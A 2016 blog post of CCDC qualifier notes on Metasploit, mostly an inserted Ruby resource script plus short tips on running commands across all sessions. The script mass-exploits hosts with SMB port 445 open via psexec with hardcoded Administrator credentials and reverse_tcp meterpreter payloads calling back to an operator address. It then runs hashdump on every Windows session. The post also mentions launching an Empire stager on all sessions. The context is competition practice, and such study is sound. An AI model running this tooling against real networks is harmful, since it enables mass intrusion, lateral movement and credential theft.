Saturday, February 27, 2016

CCDC Quals Notes (metasploit)


Some quick notes on interesting stuff worth keeping around for CCDC quals.


Rapid Fire PSExec

Use db_nmap to scan and populate the database, or db_import to import nmap XML into your workspace. This one queries the database for hosts with port 445 open:

https://gist.github.com/carnal0wnage/d058913628ba4a3d6363

This one queries the database by service name (smb) instead of by port:

https://gist.github.com/carnal0wnage/1f3944b4dd7eb6a54fd3


Running Metasploit Post modules against all sessions

Resource script to run a single post module against all sessions. Navigate to your post module, set any required options, then run this resource script.

https://gist.github.com/carnal0wnage/16cd70615dcebd378914

Got this from: https://k0st.wordpress.com/2015/07/10/running-commands-on-multiple-meterpreter-sessions/

Update: Dre mentioned one already exists in the framework here:
https://github.com/rapid7/metasploit-framework/blob/master/scripts/resource/run_all_post.rc
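As an added example (not code from this post, from the gists linked above, or from run_all_post.rc), here is the core of a resource script that covers both notes above: pull hosts with an open SMB port out of the msf database and fire psexec at each, and run one post module against every Windows meterpreter session. The target selection is written as plain Ruby functions so it can run outside msfconsole; the framework calls at the bottom only execute when the file is loaded with resource or msfconsole -r inside <ruby> ... </ruby> tags. The DB row field names, the session.platform call, the framework.db.services signature (which has changed across versions), and the credentials and addresses are all assumptions to adjust for your install:

```ruby
# Added example, not the post's or the gists' code.  Core of a Metasploit resource
# script: (a) psexec every host the msf DB shows with TCP 445 open, (b) run one
# post module on every Windows meterpreter session.  Wrap in <ruby> ... </ruby>
# when saving as an .rc file.
require 'set'

# Service rows as the msf DB returns them: one row per (host, port).  The field
# names are an assumption about the DB model; the rows themselves are constructed.
SAMPLE_SERVICES = [
  { host: '10.0.0.5', port: 445, proto: 'tcp', state: 'open',   name: 'microsoft-ds' },
  { host: '10.0.0.5', port: 139, proto: 'tcp', state: 'open',   name: 'netbios-ssn' },
  { host: '10.0.0.7', port: 445, proto: 'tcp', state: 'open',   name: 'smb' },
  { host: '10.0.0.9', port: 445, proto: 'tcp', state: 'closed', name: 'microsoft-ds' },
  { host: '10.0.0.7', port: 445, proto: 'tcp', state: 'open',   name: 'smb' } # duplicate row
].freeze

# Hosts worth a psexec attempt: TCP 445 open, one entry per address, in stable order.
def psexec_targets(services, port: 445)
  seen = Set.new
  services.each_with_object([]) do |svc, out|
    next unless svc[:proto] == 'tcp' && svc[:port] == port && svc[:state] == 'open'
    out << svc[:host] if seen.add?(svc[:host]) # add? is nil when already seen
  end
end

# msfconsole commands to psexec each target with one set of creds.  `run -j`
# backgrounds the job so the loop does not block on the first host.  RHOST is the
# 2016-era option name; current Metasploit uses RHOSTS (RHOST still resolves).
def psexec_commands(hosts, user:, pass:, lhost:, domain: '.',
                    payload: 'windows/meterpreter/reverse_tcp')
  cmds = [
    'use exploit/windows/smb/psexec',
    "set PAYLOAD #{payload}",
    "set LHOST #{lhost}",
    "set SMBDomain #{domain}",
    "set SMBUser #{user}",
    "set SMBPass #{pass}"
  ]
  hosts.each do |h|
    cmds << "set RHOST #{h}"
    cmds << 'run -j'
  end
  cmds
end

# Sessions as framework.sessions yields them: id => session object.  Only .type
# and .platform are used; these Structs are constructed stand-ins.
Sess = Struct.new(:type, :platform)
SAMPLE_SESSIONS = {
  1 => Sess.new('meterpreter', 'windows'),
  2 => Sess.new('shell',       'linux'),
  3 => Sess.new('meterpreter', 'windows'),
  4 => Sess.new('meterpreter', 'linux')
}.freeze

# Session ids a Windows meterpreter post module can actually run on.  `sessions -c`
# has no such filter: it sends the command to every session, shell or not.
def post_session_ids(sessions, type: 'meterpreter', platform: 'windows')
  sessions.select { |_id, s| s.type == type && (platform.nil? || s.platform == platform) }
          .keys.sort
end

# Commands to run one post module against each selected session, backgrounded.
def post_commands(mod, session_ids, options = {})
  cmds = ["use #{mod}"]
  options.each { |k, v| cmds << "set #{k} #{v}" }
  session_ids.each do |sid|
    cmds << "set SESSION #{sid}"
    cmds << 'run -j'
  end
  cmds
end

# Live part: only runs inside msfconsole, where `framework` and `run_single`
# exist.  framework.db.services' argument list and session.platform are
# assumptions; check them against your installed framework version.
if defined?(framework) && defined?(run_single)
  rows = framework.db.services.map do |s|
    { host: s.host.address, port: s.port, proto: s.proto, state: s.state, name: s.name }
  end
  psexec_commands(psexec_targets(rows), user: 'Administrator', pass: 'Password1',
                                        lhost: '10.0.0.2').each { |c| run_single(c) }
  post_commands('post/windows/gather/hashdump',
                post_session_ids(framework.sessions)).each { |c| run_single(c) }
end
```

Because everything is issued with run -j, check jobs and sessions -l afterwards rather than expecting output inline; a psexec against a host where the creds are wrong just fails its job and the loop moves on.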

Running a Meterpreter Command against all sessions

https://gist.github.com/carnal0wnage/b6fd24a19697e58bde96

Got the code from mubix

Running a Windows command against all sessions
This functionality is already built into the sessions command.

Just run sessions -c "command"; if you don't pick a session with -i, it runs on all sessions. It goes to every session regardless of type, so a Windows command sent to a non-Windows shell session will simply fail there.

I used this to run the Empire launcher on all sessions.

Running a Meterpreter script against all sessions


Just run sessions -s meter_script; if you don't pick a session with -i, it runs on all sessions. Since -s runs a meterpreter script (or post module), it only does anything useful on meterpreter sessions.


CG